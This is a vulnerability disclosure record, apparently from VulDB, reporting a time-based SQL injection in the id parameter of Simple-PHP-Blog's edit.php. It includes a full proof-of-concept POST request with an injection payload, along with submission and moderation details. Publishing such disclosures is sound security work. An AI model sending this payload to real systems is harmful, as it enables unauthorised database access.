| タイトル | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection |
|---|
| 説明 | Download and set up this PHP system from https://github.com/Philipinho/Simple-PHP-Blog. Then, in the edit.php file, you will notice that the id parameter is not filtered or forcibly type-casted, which makes it possible for SQL injection attacks.
POC:
POST /edit.php HTTP/1.1
Host: xxxxxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=lib8291dc1lcn1lh4nrg2d1nti
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
upd=1&id=1+OR+if(length(database())=12,sleep(2),exp(710))--&title=InjectedTitle&description=InjectedDescription&slug=injected-slug
Using this POC, SQL injection and time delay injection can be employed to inject into the length of the database. The duration of the delay is three times the value of 'x' in 'sleep(x)'. |
|---|
| ソース | ⚠️ https://github.com/woshinenbaba/CVE-/issues/1 |
|---|
| ユーザー | xiaofeifei (UID 92996) |
|---|
| 送信 | 2025年11月26日 12:35 (5 月 ago) |
|---|
| モデレーション | 2025年12月07日 18:51 (11 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 334669 [Philipinho Simple-PHP-Blog 迄 94b5d3e57308bce5dfbc44c3edafa9811893d958 /edit.php SQLインジェクション] |
|---|
| ポイント | 20 |
|---|